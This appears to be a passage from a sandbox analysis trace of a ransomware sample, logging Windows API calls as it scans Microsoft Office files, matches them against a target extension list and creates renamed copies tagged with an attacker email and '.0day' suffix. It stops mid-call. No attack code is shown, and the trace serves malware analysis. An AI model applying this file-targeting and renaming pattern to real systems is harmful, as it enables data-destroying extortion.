lstrlenW (lpString=".bz2") returned 4 [0274.849] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.849] lstrlenW (lpString=".7z") returned 3 [0274.849] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.849] lstrlenW (lpString=".dbf") returned 4 [0274.849] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.849] lstrlenW (lpString=".1cd") returned 4 [0274.849] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.849] lstrlenW (lpString=".jpg") returned 4 [0274.849] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.849] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.849] lstrlenW (lpString="OFFICE10.DLL") returned 12 [0274.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.898] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=15776) returned 1 [0274.898] CloseHandle (hObject=0x394) returned 1 [0274.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll")) returned 0x20 [0274.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.989] lstrlenW (lpString=".doc") returned 4 [0274.989] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString=".docx") returned 5 [0274.989] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0274.989] lstrlenW (lpString=".pdf") returned 4 [0274.989] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString=".xls") returned 4 [0274.989] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString=".xlsx") returned 5 [0274.989] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0274.989] lstrlenW (lpString=".ppt") returned 4 [0274.989] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.989] lstrlenW (lpString=".zip") returned 4 [0274.989] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString=".rar") returned 4 [0274.989] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.989] lstrlenW (lpString=".bz2") returned 4 [0274.989] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.989] lstrlenW (lpString=".7z") returned 3 [0274.989] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.989] lstrlenW (lpString=".dbf") returned 4 [0274.990] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".1cd") returned 4 [0274.990] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".jpg") returned 4 [0274.990] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".doc") returned 4 [0274.990] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString=".docx") returned 5 [0274.990] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0274.990] lstrlenW (lpString=".pdf") returned 4 [0274.990] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString=".xls") returned 4 [0274.990] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString=".xlsx") returned 5 [0274.990] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0274.990] lstrlenW (lpString=".ppt") returned 4 [0274.990] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".zip") returned 4 [0274.990] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString=".rar") returned 4 [0274.990] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.990] lstrlenW (lpString=".bz2") returned 4 [0274.990] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.990] lstrlenW (lpString=".7z") returned 3 [0274.990] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".dbf") returned 4 [0274.990] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.990] lstrlenW (lpString=".1cd") returned 4 [0274.990] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0274.991] lstrlenW (lpString=".jpg") returned 4 [0274.991] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.991] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.991] lstrlenW (lpString="ACCVDTUI.DLL") returned 12 [0274.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.032] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=158600) returned 1 [0275.032] CloseHandle (hObject=0x39c) returned 1 [0275.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll")) returned 0x20 [0275.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0275.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.034] lstrlenW (lpString=".doc") returned 4 [0275.034] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0275.034] lstrlenW (lpString=".docx") returned 5 [0275.034] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0275.034] lstrlenW (lpString=".pdf") returned 4 [0275.034] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0275.034] lstrlenW (lpString=".xls") returned 4 [0275.034] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.034] lstrlenW (lpString=".xlsx") returned 5 [0275.035] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0275.035] lstrlenW (lpString=".ppt") returned 4 [0275.035] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString=".zip") returned 4 [0275.035] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString=".rar") returned 4 [0275.035] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString=".bz2") returned 4 [0275.035] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.035] lstrlenW (lpString=".7z") returned 3 [0275.035] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString=".dbf") returned 4 [0275.035] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString=".1cd") returned 4 [0275.035] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString=".jpg") returned 4 [0275.035] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.035] lstrlenW (lpString=".doc") returned 4 [0275.035] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString=".docx") returned 5 [0275.035] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0275.035] lstrlenW (lpString=".pdf") returned 4 [0275.035] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString=".xls") returned 4 [0275.035] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.035] lstrlenW (lpString=".xlsx") returned 5 [0275.035] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0275.035] lstrlenW (lpString=".ppt") returned 4 [0275.036] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.036] lstrlenW (lpString=".zip") returned 4 [0275.036] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.036] lstrlenW (lpString=".rar") returned 4 [0275.036] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.036] lstrlenW (lpString=".bz2") returned 4 [0275.036] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.036] lstrlenW (lpString=".7z") returned 3 [0275.036] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.036] lstrlenW (lpString=".dbf") returned 4 [0275.036] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.036] lstrlenW (lpString=".1cd") returned 4 [0275.036] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0275.036] lstrlenW (lpString=".jpg") returned 4 [0275.036] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.036] lstrcmpiW (lpString1=".HLP", lpString2=".0day") returned 1 [0275.036] lstrlenW (lpString="ACTIP10.HLP") returned 11 [0275.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.037] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=343520) returned 1 [0275.037] CloseHandle (hObject=0x39c) returned 1 [0275.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp")) returned 0x20 [0275.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0275.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.037] lstrlenW (lpString=".doc") returned 4 [0275.037] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0275.037] lstrlenW (lpString=".docx") returned 5 [0275.037] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1 [0275.037] lstrlenW (lpString=".pdf") returned 4 [0275.037] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0275.037] lstrlenW (lpString=".xls") returned 4 [0275.037] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0275.037] lstrlenW (lpString=".xlsx") returned 5 [0275.037] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1 [0275.037] lstrlenW (lpString=".ppt") returned 4 [0275.037] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0275.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.037] lstrlenW (lpString=".zip") returned 4 [0275.037] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0275.037] lstrlenW (lpString=".rar") returned 4 [0275.037] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0275.037] lstrlenW (lpString=".bz2") returned 4 [0275.037] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0275.037] lstrlenW (lpString=".7z") returned 3 [0275.038] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString=".dbf") returned 4 [0275.038] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString=".1cd") returned 4 [0275.038] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString=".jpg") returned 4 [0275.038] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString=".doc") returned 4 [0275.038] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0275.038] lstrlenW (lpString=".docx") returned 5 [0275.038] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1 [0275.038] lstrlenW (lpString=".pdf") returned 4 [0275.038] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString=".xls") returned 4 [0275.038] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString=".xlsx") returned 5 [0275.038] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1 [0275.038] lstrlenW (lpString=".ppt") returned 4 [0275.038] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.038] lstrlenW (lpString=".zip") returned 4 [0275.038] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString=".rar") returned 4 [0275.038] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0275.038] lstrlenW (lpString=".bz2") returned 4 [0275.038] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0275.038] lstrlenW (lpString=".7z") returned 3 [0275.038] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0275.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.039] lstrlenW (lpString=".dbf") returned 4 [0275.039] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0275.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.039] lstrlenW (lpString=".1cd") returned 4 [0275.039] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0275.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0275.039] lstrlenW (lpString=".jpg") returned 4 [0275.039] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0275.039] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0275.039] lstrlenW (lpString="ACWIZRC.DLL") returned 11 [0275.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.039] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=275856) returned 1 [0275.039] CloseHandle (hObject=0x39c) returned 1 [0275.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll")) returned 0x20 [0275.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\acwizrc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString=".doc") returned 4 [0275.040] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString=".docx") returned 5 [0275.040] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0275.040] lstrlenW (lpString=".pdf") returned 4 [0275.040] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString=".xls") returned 4 [0275.040] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString=".xlsx") returned 5 [0275.040] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0275.040] lstrlenW (lpString=".ppt") returned 4 [0275.040] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString=".zip") returned 4 [0275.040] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString=".rar") returned 4 [0275.040] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.040] lstrlenW (lpString=".bz2") returned 4 [0275.040] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.040] lstrlenW (lpString=".7z") returned 3 [0275.040] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString=".dbf") returned 4 [0275.040] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString=".1cd") returned 4 [0275.040] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.040] lstrlenW (lpString=".jpg") returned 4 [0275.040] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString=".doc") returned 4 [0275.041] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString=".docx") returned 5 [0275.041] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0275.041] lstrlenW (lpString=".pdf") returned 4 [0275.041] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString=".xls") returned 4 [0275.041] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString=".xlsx") returned 5 [0275.041] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0275.041] lstrlenW (lpString=".ppt") returned 4 [0275.041] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString=".zip") returned 4 [0275.041] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString=".rar") returned 4 [0275.041] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0275.041] lstrlenW (lpString=".bz2") returned 4 [0275.041] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0275.041] lstrlenW (lpString=".7z") returned 3 [0275.041] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString=".dbf") returned 4 [0275.041] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString=".1cd") returned 4 [0275.041] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0275.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACWIZRC.DLL") returned 59 [0275.041] lstrlenW (lpString=".jpg") returned 4 [0275.041] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0275.042] lstrcmpiW (lpString1=".VSL", lpString2=".0day") returned 1 [0275.042] lstrlenW (lpString="AEC.VSL") returned 7 [0275.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0275.051] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=69496) returned 1 [0275.051] CloseHandle (hObject=0x390) returned 1 [0275.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl")) returned 0x20 [0275.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0275.052] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.052] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0275.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0275.052] GetLastError () returned 0x0 [0275.052] ReadFile (in: hFile=0x390, lpBuffer=0x43f0020, 